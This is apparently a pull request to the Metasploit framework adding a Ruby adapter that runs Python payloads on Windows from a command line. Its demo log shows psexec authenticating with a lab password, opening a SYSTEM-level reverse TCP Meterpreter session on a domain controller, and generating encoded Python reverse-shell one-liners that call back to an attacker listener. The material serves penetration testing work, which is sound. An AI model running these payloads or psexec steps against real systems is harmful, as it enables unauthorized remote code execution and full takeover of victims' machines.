### PR TITLE
Add the Python command adapter for Windows

### DIFF
--- a/modules/payloads/adapters/cmd/windows/python.rb
+++ b/modules/payloads/adapters/cmd/windows/python.rb
@@ -1,0 +1,50 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Python Exec',
+        'Description' => 'Execute a Python payload from a command',
+        'Author' => 'Spencer McIntyre',
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_PYTHON,
+        'AdaptedPlatform' => 'python',
+        'RequiredCmd' => 'python'
+      )
+    )
+    register_advanced_options(
+      [
+        OptString.new('PythonPath', [true, 'The path to the Python executable', 'python'])
+      ]
+    )
+  end
+
+  def compatible?(mod)
+    # size is not unlimited due to the standard command length limit, the final size depends on the options that are
+    # configured but 3,000 is in a good range (can go up to 4,000 with default settings at this time)
+    if mod.type == Msf::MODULE_PAYLOAD && (mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic) && (mod.class::CachedSize >= 3_000)
+      return false
+    end
+
+    super
+  end
+
+  def generate
+    payload = super
+
+    if payload.include?("\n")
+      payload = Msf::Payload::Python.create_exec_stub(payload)
+    end
+
+    "#{datastore['PythonPath']} -c \"#{payload}\""
+  end
+end


### PR DESCRIPTION
This adds an adapter to run Python payloads on Windows. This is notably useful for testing Python payloads as SYSTEM or delivered on demand through an exploit module such as psexec.

## Verification

List the steps needed to make sure this thing works

- [x] Install Python on a Windows target
- [x] Use the psexec module
- [x] Set the TARGET to Command
- [x] Set the Payload to cmd/windows/python/*
- [x] Run the module and see some psexec error messages (no stack traces) stating that the command output couldn't be obtained (this is because the payload is still running)

## Demo

```
msf6 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.159.10   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             msflab.local     no        The Windows domain to use for authentication
   SMBPass               Password1!       no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               smcintyre        no        The username to authenticate as


Payload options (cmd/windows/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Executing the command...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[*] Sending stage (24380 bytes) to 192.168.159.10
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.10:49819) at 2023-01-20 15:11:53 -0500
[*] 192.168.159.10:445 - Checking if the file is unlocked...
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\SmkuOOtep.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC
OS              : Windows 2016 (Build 17763)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.159.10 - Meterpreter session 4 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > use payload/cmd/windows/python/meterpreter/reverse_tcp
msf6 payload(cmd/windows/python/meterpreter/reverse_tcp) > generate -f raw LHOST=192.168.159.128
python -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/orckGMO2dMvuYgURDyIiuHsTkTYdtTRNQiarVfG/25DFOczwZt68+RgmZ33I0aoRgvjWQye6FqGuBAZ/VEGEYQLyan0+54PJfWvegBUrviNZ8F+Lz7BJzTIFVooT3j9c373sD483V/c88qSyxoAKjNFiW8qi3shivZVFuaGiWoxHVuehHUkGswIXonycL1EDOLbmRDdpLXk0rlUjo5e3VKD0oD7YIvC0eiZ9c8Kak8/3QUOuwbCeX+hFrj/7r56nNCcwg2LxctmDspPzgMjSE2RXVzHZQ2SKH4p0h7+c/AHAsF+j')[0])))"
msf6 payload(cmd/windows/python/meterpreter/reverse_tcp) > generate -f raw LHOST=192.168.159.128 PythonPath="\"C:\\Python310\\python.exe\""
"C:\Python310\python.exe" -c "exec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/orckGMO2dMvuYgURDyIiuHsTkTYdtTRNQiarVfG/25DFOczwZt68+RgmZ33I0aoRgvjWQye6FqGuBAZ/VEGEYQLyan0+54PJfWvegBUrviNZ8F+Lz7BJzTIFVooT3j9c373sD483V/c88qSyxoAKjNFiW8qi3shivZVFuaGiWoxHVuehHUkGswIXonycL1EDOLbmRDdpLXk0rlUjo5e3VKD0oD7YIvC0eiZ9c8Kak8/3QUOuwbCeX+hFrj/7r56nNCcwg2LxctmDspPzgMjSE2RXVzHZQ2SKH4p0h7+c/AHAsF+j')[0])))"
msf6 payload(cmd/windows/python/meterpreter/reverse_tcp) >
```
